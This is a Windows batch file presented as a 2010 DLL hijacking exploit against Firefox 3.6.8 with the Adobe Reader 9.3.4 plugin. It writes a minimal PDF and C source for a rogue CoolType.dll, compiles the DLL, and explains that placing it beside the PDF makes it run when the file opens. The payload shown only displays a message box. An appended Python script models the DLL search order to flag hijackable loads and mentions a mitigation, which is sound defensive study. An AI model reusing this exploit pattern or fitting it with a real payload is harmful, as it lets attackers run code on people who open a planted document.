@echo off
GOTO START
* [*]
* [*] Mozilla Firefox 3.6.8 Adobe Reader Plugin 9.3.4.218 DLL Hijacking Exploit (CoolType.dll)
* [*]
* [*] Author: Rh0 (Rh0[at]z1p.biz)
* [*] Date: August 26, 2010
* [*] Affected Software: Mozilla Firefox 3.6.8 with Adobe Reader Plugin 9.3.4.218
* [*] Tested on: Windows XP Pro SP3 x86 En
* [*] Description:
*
*   Affected Extensions: .pdf .pdfxml .mars .fdf .xfdf .xdp .xfd
*
*   When Firefox plugins are used, the DLLs the plugin needs are searched
*   for in the following directories, in this order:
*
*     mozilla firefox dir
*     windows system32 dir
*     windows system dir
*     windows dir
*     current dir          <-- hijack possibility
*     plugin program dir
*
*   Because the current directory is probed before the plugin's own directory,
*   a plugin DLL that is not present in any of the earlier directories can be
*   hijacked by a same-named DLL placed next to the opened file.
*   Two examples for the Adobe Reader plugin:
*     CoolType.dll
*     authplay.dll (if the pdf contains an embedded swf file)
*
*   This batch file creates a minimal pdf file and CoolType.c, and compiles
*   the latter to CoolType.dll (gcc has to be installed).
*   When the pdf is opened with Firefox, CoolType.dll gets executed, provided
*   both files are in the same directory.
*   So pdf files embedded in an html file could be used to hijack Adobe Reader DLLs.
*   For this exploit to work, Firefox and the Adobe Reader 9.3.4 plugin have to be installed.
*   To test the other extensions, simply change the extension of the pdf file
*   and open it with Firefox.

:START
echo.
echo [*]
echo [*] Creating pdf file...
REM PDF FILENAME
set pdf=OpenwithFirefox.pdf

REM A digit directly before ">" is parsed by cmd.exe as a file handle
REM (e.g. "1.4>" redirects handle 4), so the redirect is written first
REM on the lines whose text ends in a digit.
>"%pdf%" echo %%PDF-1.4
echo %%Çìó¢>>"%pdf%"
echo 1 0 obj ^<^< /Type /Catalog /ViewerPreferences ^<^< /NonFullScreenPageMode /UseNone ^>^> /PageLayout /SinglePage /Pages 2 0 R /PageMode /UseNone ^>^> endobj>>"%pdf%"
echo 2 0 obj ^<^< /Type /Pages /Kids [ 5 0 R ] /Resources 3 0 R /Count 1 ^>^> endobj>>"%pdf%"
echo 3 0 obj ^<^< /ProcSet [ /PDF /Text /ImageB /ImageC /ImageI ] ^>^> endobj>>"%pdf%"
echo 4 0 obj ^<^< /Producer (PDF::API2 0.69 [linux]) ^>^> endobj>>"%pdf%"
echo 5 0 obj ^<^< /Type /Page /Parent 2 0 R /Resources ^<^< /ProcSet [ /PDF /Text /ImageB /ImageC /ImageI ] ^>^> ^>^> endobj>>"%pdf%"
echo xref>>"%pdf%"
echo 0 6 >>"%pdf%"
echo 0000000000 65535 f>>"%pdf%"
echo 0000000015 00000 n>>"%pdf%"
echo 0000000164 00000 n>>"%pdf%"
echo 0000000240 00000 n>>"%pdf%"
echo 0000000309 00000 n>>"%pdf%"
echo 0000000365 00000 n>>"%pdf%"
echo trailer>>"%pdf%"
echo ^<^< /Root 1 0 R /Size 6 /Info 4 0 R ^>^>>>"%pdf%"
echo startxref>>"%pdf%"
>>"%pdf%" echo 477
echo %%%%EOF>>"%pdf%"
echo [*] %pdf% created.
echo [*]
echo [*] Creating CoolType.c source...

REM DLL SOURCE FILENAME
set dllsrc=CoolType.c

echo #include ^<windows.h^>>"%dllsrc%"
echo #define DLLExport __declspec (dllexport)>>"%dllsrc%"
echo int runme()>>"%dllsrc%"
echo {>>"%dllsrc%"
echo     MessageBox(0, "Firefox with Adobe Reader Plugin DLL Hijacking", "Message from CoolType.dll", MB_OK);>>"%dllsrc%"
echo     return 0;>>"%dllsrc%"
echo }>>"%dllsrc%"
echo DLLExport void CTCleanup() { runme(); }>>"%dllsrc%"
echo DLLExport void CTGetVersion() { runme(); }>>"%dllsrc%"
echo DLLExport void CTInit() { runme(); }>>"%dllsrc%"
echo [*] Done.
echo [*] Compiling CoolType.dll...
gcc -shared -o CoolType.dll CoolType.c
echo [*] Done
echo [*]
echo [*] Copy "%pdf%" and CoolType.dll to the same
echo [*] directory, open directory in windows explorer
echo [*] and open "%pdf%" in Firefox.
echo [*]
pause
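The search order in the description above is what makes the hijack possible: any directory probed before the plugin's own directory that an untrusted party can populate wins the lookup. The following Python script is an added example, not part of the original exploit, that models exactly that order and audits which plugin DLLs a loader would take from the current directory. The directory contents, the `DEMO_CONTENTS` layout, and the `PLUGIN_DLLS` list are constructed for the demonstration; the search order itself is the one listed in the advisory.

```python
"""
Added example (not part of the original exploit): model the DLL search
order the advisory lists and flag loads that would resolve from the
current directory. All directory contents below are constructed.
"""
from dataclasses import dataclass
from typing import Dict, Iterable, List, Optional, Set

# Search order as listed in the advisory, from first probed to last.
SEARCH_ORDER = [
    "mozilla firefox dir",
    "windows system32 dir",
    "windows system dir",
    "windows dir",
    "current dir",
    "plugin program dir",
]

# Locations an unprivileged user, or a downloaded document, can populate.
UNTRUSTED_LOCATIONS = {"current dir"}


@dataclass(frozen=True)
class Resolution:
    dll: str
    found_in: Optional[str]       # directory role the loader would pick, or None
    legitimate_in: Optional[str]  # first trusted directory that actually holds it
    hijackable: bool              # picked from an untrusted directory


def resolve(dll: str, contents: Dict[str, Set[str]]) -> Resolution:
    """Walk the search order and report where `dll` would be loaded from.

    `contents` maps a directory role to the file names it holds. Matching is
    case-insensitive, as it is on NTFS.
    """
    name = dll.lower()
    found_in: Optional[str] = None
    legitimate_in: Optional[str] = None
    for role in SEARCH_ORDER:
        names = {n.lower() for n in contents.get(role, set())}
        if name not in names:
            continue
        if found_in is None:
            found_in = role  # the loader stops at the first hit
        if role not in UNTRUSTED_LOCATIONS and legitimate_in is None:
            legitimate_in = role
    return Resolution(dll, found_in, legitimate_in, found_in in UNTRUSTED_LOCATIONS)


def audit(plugin_dlls: Iterable[str], contents: Dict[str, Set[str]]) -> List[str]:
    """Return, sorted, the plugin DLLs the loader would take from an untrusted directory."""
    return sorted(r.dll for r in (resolve(d, contents) for d in plugin_dlls) if r.hijackable)


# Constructed layout: the plugin ships CoolType.dll and authplay.dll in its own
# directory; the folder holding the opened PDF (the "current dir" when a file is
# opened from Explorer) contains a same-named CoolType.dll.
DEMO_CONTENTS: Dict[str, Set[str]] = {
    "mozilla firefox dir": {"firefox.exe", "xul.dll", "nss3.dll"},
    "windows system32 dir": {"kernel32.dll", "user32.dll"},
    "plugin program dir": {"nppdf32.dll", "CoolType.dll", "authplay.dll"},
    "current dir": {"OpenwithFirefox.pdf", "CoolType.dll"},
}
PLUGIN_DLLS = ["CoolType.dll", "authplay.dll", "user32.dll"]

if __name__ == "__main__":
    for d in PLUGIN_DLLS:
        r = resolve(d, DEMO_CONTENTS)
        tag = "HIJACKABLE" if r.hijackable else "ok"
        print(f"{r.dll:14} -> {str(r.found_in):22} [{tag}]")
    print("flagged:", audit(PLUGIN_DLLS, DEMO_CONTENTS))
```

Only `CoolType.dll` is flagged: `authplay.dll` exists solely in the plugin directory, and `user32.dll` is satisfied from `system32` before the current directory is ever probed. The same model explains the mitigations: a DLL that the application ships in an earlier directory, or that the host process removes the current directory from the search path for (on Windows, `SetDllDirectory("")` does this for the calling process), cannot be shadowed by a file dropped next to a document.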